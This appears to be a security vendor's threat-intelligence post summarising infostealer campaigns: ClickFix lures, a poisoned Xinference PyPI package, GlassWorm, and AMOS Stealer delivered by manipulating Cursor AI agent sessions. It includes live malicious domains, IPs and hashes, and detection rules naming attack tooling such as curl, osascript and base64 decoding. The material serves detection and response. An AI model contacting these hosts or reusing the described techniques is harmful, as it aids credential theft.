Back to Intelligence

ClickFix, PyPI Poisoning, & AI Abuse: Coordinated Infostealer Surge — OTX Pulse Analysis

SA
Security Arsenal Team
April 28, 2026
6 min read

Date: 2026-04-28 Source: AlienVault OTX Live Pulses

Threat Summary

Recent OTX pulse data indicates a convergence of high-risk threat activity focusing on credential theft and initial access via software supply chains and AI interfaces. Over the last 72 hours, five distinct pulses highlight a shift from commodity malware to sophisticated, developer-focused attacks.

  • ClickFix Campaigns: A resurgence of the "ClickFix" social engineering technique is observed, impersonating services like QuickBooks and Booking.com to trick users into running native system commands (Living Off the Land), ultimately delivering payloads like Vidar, Lumma Stealer, and Redline.
  • Supply Chain Compromise: The Xinference PyPI package (versions 2.6.0–2.6.2) was poisoned to harvest cloud credentials, while the "GlassWorm" malware targets developers via compromised code repositories, using the Solana blockchain for C2 obfuscation.
  • AI Tool Abuse: A novel campaign delivers the AMOS Stealer by manipulating Cursor AI agent sessions, tricking operators into executing malicious AppleScript.
  • Traffic Distribution: Abuse of the Keitaro TDS platform is facilitating the distribution of DonutLoader, StealC, and ScreenConnect.

Collectively, these campaigns aim to harvest cryptocurrency wallets, development keys, and cloud credentials, likely for initial access brokering and fraud.

Threat Actor / Malware Profile

Malware / ActorDistribution MethodPayload BehaviorC2 / PersistenceNotable Techniques
ClickFix ClustersPhishing emails / Fake browser alertsStealers (Lumma, Vidar, Redline, Odyssey)Standard HTTP C2Uses native tools (cmd, PowerShell) to bypass defenses; Living-off-the-Land (LotL).
GlassWormCompromised code repos / PackagesSteals crypto wallets, dev creds; Installs RATUses Solana blockchain for payload fetchingSophisticated fingerprinting; Fake browser extension for surveillance.
AMOS StealerSocial Engineering via Cursor AI AgentCredential harvesting; System info theftUnknown (AppleScript loader)Exploits trust in AI agents; heavily obfuscated scripts; Sandbox evasion.
Xinference (PyPI)Supply Chain Poisoning (PyPI)Steals cloud credentialsBase64 encoded in __init__.pyExecutes on install/import; Targeted at AI framework users.
StealC / DonutLoaderKeitaro TDS (Malvertising)Info Theft / LoaderTraffic Distribution System (TDS)Domain hijacking; Cloaking to avoid security scanners.

IOC Analysis

The provided IOCs span multiple vectors requiring distinct defensive postures:

  • Domains (High Volume): The Keitaro and ClickFix pulses provide a large list of domains (e.g., ustazazharidrus.com, ucaboodle.com, mpasvw.com). These are used for C2 communication, phishing landing pages, and traffic distribution.
    • Action: Block at the DNS layer.
  • File Hashes (PyPI & AMOS): Specific MD5 and SHA256 hashes are provided for the malicious Xinference packages and the AMOS loader.
    • *Action:*EDR correlation and file system scans.
  • IP Addresses: The AMOS campaign lists specific C2 IPs (45.94.47.204, 92.246.136.14).
    • Action: Firewall blocking.
  • URLs: Specific URLs (e.g., https://arkypc.com/n8n/update) indicate payload staging.
    • Action: Proxy blocking and SSL inspection.

Tooling Recommendation: Use jq to parse the OTX JSON export, and feed IOCs into your SIEM (Splunk/QRadar) and EDR (CrowdStrike/SentinelOne) via API for automated blocking.

Detection Engineering

Sigma Rules

YAML
---
title: Potential ClickFix Social Engineering Activity
id: 89d9f8a2-7b4c-4f2d-9e1a-1c3b5a6b7c8d
description: Detects suspicious command line arguments often used in ClickFix campaigns where users are tricked into running fixes via PowerShell or CMD copied from browser popups.
status: experimental
date: 2026/04/28
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - '\chrome.exe'
      - '\firefox.exe'
      - '\msedge.exe'
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\mshta.exe'
    CommandLine|contains:
      - 'copy'
      - 'paste'
      - 'clipboard'
      - 'regsvr32'
      - 'msiexec'
  condition: selection
falsepositives:
  - Legitimate IT support scripts
level: high
tags:
  - attack.initial_access
  - attack.execution
  - attack.user_execution
---
title: PyPI Package Supply Chain Compromise via Base64
id: 71c2e9b3-8c5d-4e3a-0f2b-2d4e6f8a9b1c
description: Detects Python processes decoding Base64 strings, a technique used in the Xinference supply chain attack to hide malicious payloads.
status: experimental
date: 2026/04/28
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith: '\python.exe'
  selection_cli:
    CommandLine|contains: 'base64'
  selection_module:
    CommandLine|contains:
      - 'base64.b64decode'
      - '-d'
  condition: all of selection_*
falsepositives:
  - Legitimate software installations
level: medium
tags:
  - attack.initial_access
  - attack.supply_chain
---
title: AMOS Stealer Delivery via Cursor AI Agent
id: 62b1d8c4-7d6e-5f4b-1a3c-3e5f7g9h0i1j
description: Detects suspicious child processes spawned by the Cursor AI IDE (or similar dev tools) initiating scripts or downloads, indicative of AMOS Stealer activity.
status: experimental
date: 2026/04/28
author: Security Arsenal
logsource:
  category: process_creation
  product: macos
detection:
  selection_parent:
    ParentImage|contains: 'Cursor'
  selection_child:
    Image|endswith:
      - '/osascript'
      - '/bash'
      - '/sh'
      - '/curl'
  selection_cli:
    CommandLine|contains:
      - 'download'
      - 'http'
  condition: all of selection_*
falsepositives:
  - Legitimate developer build scripts
level: high
tags:
  - attack.initial_access
  - attack.execution
  - attack.t1204

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix and AMOS Network IOCs
let IoC_Domains = dynamic(["ustazazharidrus.com", "account-help.info", "quiptly.com", "elive123go.com", "visitbundala.com", "nhacaired88.com", "subsgod.com", "ariciversontile.com", "mpasvw.com", "arkypc.com", "ucaboodle.com", "someotherbox.com", "your-link.online", "linda-makeup.com", "cibcsecurity2fa.com", "rbcdevice-login.com", "yellowusheart.net"]);
let IoC_IPs = dynamic(["45.94.47.204", "92.246.136.14"]);
DeviceNetworkEvents
| where RemoteUrl in (IoC_Domains) or RemoteIP in (IoC_IPs)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
| extend AlertMessage = "OTX Pulse Indicator Match"

PowerShell IOC Hunt

PowerShell
<#
.SYNOPSIS
    IOC Hunt for April 2026 OTX Pulses (PyPI & AMOS)
.DESCRIPTION
    Scans the file system for known malicious file hashes associated with Xinference and AMOS Stealer.
#>

$TargetHashes = @(
    "3ee893ae46530b92e0d26435fb979d82", "484067fd6232f7cdd7b664b33857fc2c",
    "971670c10eff28339a085ca50a600e35", "9b3257e45b27a6bbe4e240e41a3a306f",
    "c6ce4e25f7fe3e3bb1eea2e9052483bf", "e291734d46c313a23d676681499f8846",
    "312147c0ae0d555a4d50fa627ff7d4f3", "c54620dd3745fdeaff5ccc0db4132f11"
)

Write-Host "Starting IOC Scan... Please wait." -ForegroundColor Cyan

# Search C:\ for files matching the hashes (Note: This may take time)
$Matches = Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
    Where-Object { -not $_.PSIsContainer } | 
    ForEach-Object {
        $Hash = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        if ($Hash -in $TargetHashes) {
            $_
        }
    }

if ($Matches) {
    Write-Host "[ALERT] Malicious files found:" -ForegroundColor Red
    $Matches | Select-Object FullName, Length, LastWriteTime
} else {
    Write-Host "No matching files found." -ForegroundColor Green
}

# Check Hosts File for ClickFix/Keitaro domains
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
$SuspiciousHosts = @("ustazazharidrus.com", "arkypc.com")

$HostsContent = Get-Content $HostsPath
foreach ($HostEntry in $SuspiciousHosts) {
    if ($HostsContent -match $HostEntry) {
        Write-Host "[ALERT] Suspicious entry found in hosts file: $HostEntry" -ForegroundColor Red
    }
}

Response Priorities

  • Immediate:
    • Block all listed domains and IPs at the firewall and proxy level.
    • Scan developer workstations and build servers for the Xinference Python package versions (2.6.0, 2.6.1, 2.6.2).
  • 24 Hours:
    • If credential-stealing malware (AMOS, Lumma, Redline) is suspected, force a password reset for impacted accounts and invalidate active session tokens (Cloud, GitHub, Internal).
    • Audit logs for access to arkypc.com or connections to 45.94.47.204.
  • 1 Week:
    • Implement strict allow-listing for AI coding assistants (Cursor) and monitor their spawned processes.
    • Review software supply chain security; require signed commits and package verification for internal PyPI usage.
    • Educate finance and accounting teams on "ClickFix" fake browser error techniques.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsinfostealersupply-chain-attackai-abuseclickfixglassworm

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action